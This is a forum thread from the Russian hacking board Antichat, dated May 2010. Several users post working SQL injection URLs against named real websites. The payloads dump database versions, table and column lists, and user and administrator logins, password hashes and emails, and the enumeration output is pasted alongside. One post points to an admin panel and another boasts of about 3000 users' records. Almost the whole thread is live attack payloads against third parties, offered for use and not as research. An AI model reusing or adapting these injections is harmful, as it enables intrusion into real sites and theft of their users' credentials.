ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.05.2010, 20:09
|
|
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379
Репутация:
1069
|
|
Сайт: http://www.infotex.ru
ТИЦ: 80
PR: 4
Примеры запросов:
Код:
http://www.infotex.ru/index4.php?p=-174+union+select+1,group_concat(0x0b,column_name),3,4,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),6,now(),8,9+from+information_schema.columns+where+table_name=0x7573657273--+
http://www.infotex.ru/index4.php?p=-174+union+select+1,group_concat(0x0b,login,0x3a,hash,0x3a,salt),null,4,group_concat(0x0b,mail),6,now(),8,9+from+users--+
version - 5.1.36-log
user - fotoclub31_mysql@212.193.241.39
database - fotoclub31_computer31
os - portbld-freebsd7.2
tables:
Код:
CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
ENGINES,
EVENTS,
FILES,
GLOBAL_STATUS,
GLOBAL_VARIABLES,
KEY_COLUMN_USAGE,
PARTITIONS,
PLUGINS,
PROCESSLIST,
PROFILING,
REFERENTIAL_CONSTRAINTS,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
SESSION_STATUS,
SESSION_VARIABLES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
Product,
Product2,
Product3,
all_Product,
group_name,
group_name_main,
info_for_redact_infotex,
info_for_redact_teny_mce,
menu_left,
new_Product,
news,
news_infotex,
our_news,
tehcentr,
text_in_page,
text_main_in_page,
type_news_infotex,
upd_price,
users,
vendor,
Product,
Product3,
advice,
albom_for_exhibition,
author,
beeline_galery,
beeline_galery_ball_user,
book_biblioteka,
categories,
club_cart_info,
coment_advice,
coment_personal_page,
coment_photo_help,
coment_reportage,
comment_photo,
comment_photo2,
config,
config_db,
discussion_author_photo,
exhibition,
favorite_author_photo,
for_del_photo,
foto_blic_o
columns:
Код:
CHARACTER_SET_NAME,
DEFAULT_COLLATE_NAME,
DESCRIPTION,
MAXLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
ID,
IS_DEFAULT,
IS_COMPILED,
SORTLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
COLUMN_DEFAULT,
IS_NULLABLE,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
CHARACTER_OCTET_LENGTH,
NUMERIC_PRECISION,
NUMERIC_SCALE,
CHARACTER_SET_NAME,
COLLATION_NAME,
COLUMN_TYPE,
COLUMN_KEY,
EXTRA,
PRIVILEGES,
COLUMN_COMMENT,
GRANTEE,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
PRIVILEGE_TYPE,
IS_GRANTABLE,
ENGINE,
SUPPORT,
COMMENT,
TRANSACTIONS,
XA,
SAVEPOINTS,
EVENT_CATALOG,
EVENT_SCHEMA,
EVENT_NAME,
DEFINER,
TIME_ZONE,
EVENT_BODY,
EVENT_DEFINITION,
EVENT_TYPE,
EXECUTE_AT,
INTERVAL_VALUE,
INTERVAL_FIELD,
SQL_MODE,
STARTS,
ENDS,
STATUS,
ON_COMPLETION,
CREATED,
LAST_ALTERED,
LAST_EXECUTED,
EVENT_COMMENT,
ORIGINATOR,
CHARACTER_SET_CLIENT,
COLLATION_CONNECTION,
DATABASE_COLLATION,
FILE_ID,
FILE_NAME,
FILE_TYPE,
TABLESPACE_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAM
========================================
Сайт: http://www.kazanclub.ru
ТИЦ: 20
PR: 0
Примеры запросов:
Код:
http://www.kazanclub.ru/gallery.php?cat=-4+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6--+
http://www.kazanclub.ru/gallery.php?cat=-4+union+select+1,group_concat(0x0b,column_name),3,4,5,6+from+information_schema.columns--+
version - 5.1.41-log
user - kazanclu_rukazan@localhost
database - kazanclu_rukazanclub2
os - unknown-linux-gnu
tables:
Код:
CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
ENGINES,
EVENTS,
FILES,
GLOBAL_STATUS,
GLOBAL_VARIABLES,
KEY_COLUMN_USAGE,
PARTITIONS,
PLUGINS,
PROCESSLIST,
PROFILING,
REFERENTIAL_CONSTRAINTS,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
SESSION_STATUS,
SESSION_VARIABLES,
STATISTICS,
TABLES,
TABLE_
columns:
Код:
CHARACTER_SET_NAME,
DEFAULT_COLLATE_NAME,
DESCRIPTION,
MAXLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
ID,
IS_DEFAULT,
IS_COMPILED,
SORTLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
COLUMN_DEFAULT,
IS_NULLABLE,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
CHARACTER_OCTET_LENGTH,
NUMER
Последний раз редактировалось aka_zver; 06.05.2010 в 20:38..
|
|
|
06.05.2010, 21:14
|
|
Познающий
Регистрация: 10.01.2009
Сообщений: 31
Провел на форуме:
1128838
Репутация:
36
|
|
Код:
http://www.zaglyani.ru/links/category.php?dir=2&uid=-921+union+select+1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9,10,11,12+--+
user() - u156963@10.10.153.211
version() - 5.0.67-log
database() - u156963 |
|
|
|
06.05.2010, 22:37
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://www.carte-bleue.com/page.asp?menu_id=26+OR+1=(SELECT+TOP+1+password+FR OM+tbl_user_admin+where+Login='webadmcb')
(pinch sps)
|
|
|
|
06.05.2010, 22:42
|
|
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674
Репутация:
65
|
|
Host IP: 216.218.227.242
Web Server: Apache/2.0.54 (Unix) mod_perl/1.99_09 Perl/v5.8.0 mod_ssl/2.0.54 OpenSSL/0.9.7a DAV/2 FrontPage/5.0.2.2635 PHP/4.4.0 mod_gzip/2.0.26.1a
Powered-by: PHP/4.4.0
DB Server: MySQL
Current DB: warren
Host IP: 89.18.180.54
Web Server: Apache/2
Powered-by: PHP/5.2.5
DB Server: MySQL >=5
Current DB: lulworth_Algemeen
Host IP: 213.21.225.48
Web Server: Apache
DB Server: MySQL >=4.1
Current DB: warehouse
www.medy.ru/pages.php?id=296UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12--
Host IP: 77.221.132.188
Web Server: nginx/0.4.13
Powered-by: PHP/5.2.0-8+etch11
DB Server: MySQL >=5
Current DB: dex
Host IP: 89.18.180.54
Web Server: Apache/2
Powered-by: PHP/5.2.5
DB Server: MySQL >=5
Current DB: lulworth_Algemeen
Host IP: 140.130.1.19
Web Server: Apache/2.2.10 (Unix) PHP/4.4.9
Powered-by: PHP/4.4.9
DB Server: MySQL >=5
Current DB: RSS23_NFU
http://www.connexions-berkshire.org....php?id=95UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,%String_Col%,12,13,14--
Host IP: 217.77.176.230
Web Server: Zeus/4.2
Powered-by: PHP/4.4.2
DB Server: MySQL
Current DB: connexions-berkshire
www.marinaautostadium.com/pages.php?id=24 UNION ALL SELECT 1,2,3,%String_Col%,5,6,7,8,9,10,11--
Host IP: 69.163.245.54
Web Server: Apache
Powered-by: PHP/5.2.12
DB Server: MySQL >=5
Current DB: rhinossoccer
|
|
|
|
07.05.2010, 11:28
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953
Репутация:
443
|
|
Шопер какой то..
http://pc-rakitan.com/home/?v=modul&mod=order&id=-3549+union+select+concat_ws(0x3a,user(),version(), database())--&a=add
Database Version: 5.0.89-community
Database name: pcrakit_cmscatalog
User name: pcrakit_usercms@localhost
Ракитанчиков там в 3000 -)
http://pc-rakitan.com/home/?v=modul&mod=order&id=-3549+UNION+SELECT+CONCAT(0x3a,(SELECT+CONCAT(membe rs_password,0x3a,members_email)+FROM+pcrakit_cmsca talog.cms_members+LIMIT+50,1),0x3a)-- &a=add
|
|
|
|
07.05.2010, 16:16
|
|
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439
Репутация:
127
|
|
Код:
http://www.brilliant-info.ru/showinfo.php?id=99999+or%281,1%29=%28select+count%280%29,concat%28%28select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29--++
User: u55884@localhost
Version: 5.0.77
Database: brillian_info
Код:
http://www.procctv.ru/page.php?id=-1%27+or%281,1%29=%28select+count%280%29,concat%28%28select+concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29--++
User: procctv@localhost
Database: cms
Version: 5.0.45-log
Код:
http://www.advokaterne.net/index.php?act=info&id=-1+or%281,1%29=%28select+count%280%29,concat%28%28select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29--++
User: web57_u1@localhost
Version: 5.0.51a-24+lenny3
Database: web57_db1
Код:
http://www.bad-endbach.info/index.php?id=1699&lang=-1+or%281,1%29=%28select+count%280%29,concat%28%28select+concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29--++
User: 'dbo242799363@212.227.119.4
Version: 5.0.81-log
Database: db242799363
Последний раз редактировалось b82a; 07.05.2010 в 19:01..
|
|
|
|
07.05.2010, 19:05
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Код:
http://www.belmontburlesque.com/cast.php?id=-2+union+select+1,group_concat%28user_name,0x3a,user_password%29,3,4,5,6,7+from+administrators--
|
|
|
|
07.05.2010, 19:34
|
|
Новичок
Регистрация: 03.05.2010
Сообщений: 4
Провел на форуме:
71594
Репутация:
4
|
|
Pr 3
http://www.lanceburton.org/
http://www.lanceburton.org/cast.php?id=-1+union+all+select+1,2,version(),4,5,6
User: LANCEBURT@APACHE2-ICHIBAN.CONSTANTINE.DREAMHOST.COM
Version: 5.1.39-LOG
Database: LBURTON
|
|
|
|
07.05.2010, 20:34
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684
Репутация:
136
|
|
Код:
http://www.troykastal.ru/second.php?content_id=news_item&news_id=-177+union+all+select+1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3+--
version : 5.0.24-standard
user : troykastal@localhost.localdomain
database : db_troykastal
os : pc-linux-gnu
Код:
http://www.troykastal.ru/second.php?content_id=news_item&news_id=-177+union+all+select+1,concat_ws(0x3a,login,password),3+from+admin--
http://www.troykastal.ru/administrator/ |
|
|
|
07.05.2010, 21:17
|
|
Участник форума
Регистрация: 07.02.2010
Сообщений: 111
Провел на форуме:
619439
Репутация:
127
|
|
Эх, надоело с ней возиться
Код:
http://tur.by/index.php?page=info&mode=region&id=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,19,20,21,22,23,24,25,26,27%20+--+&cid=36&rating=3&full
User: turby@localhost
Database: turby
Version: 5.0.32-Debian_7etch5
И всё чо надыбал пока возился:
http://tur.by/index.php?page=info&mode=region&id=1%20UNION%20SEL ECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,co ncat_ws%280x3a,table_schema,TABLE_NAME%29,19,20,21 ,22,23,24,25,26,27%20from%20information_schema.tab les%20--+&cid=36&rating=3&full
turby:account
id
login
password
passMD5
email
icq
homepage
type
date
last_date
turby:jos_g2_User
g2_id
g2_userName
g2_fullName
g2_hashedPassword
g2_email
g2_language
g2_locked
turby:jos_users
id
name
username
email
password
usertype
block
sendEmail
gid
registerDate
lastvisitDate
activation
params
turby  x_users
user_id
contact_name
email_address
username
password
language
default_account_id
comments
active
sso_user_id
date_created
date_last_login
email_updated
turby:tur_user_list
id
login
password
passMD5
email
icq
homepage
type
reg_date
last_login Ну и хеши соответственно нельзя 
Последний раз редактировалось b82a; 07.05.2010 в 21:24..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
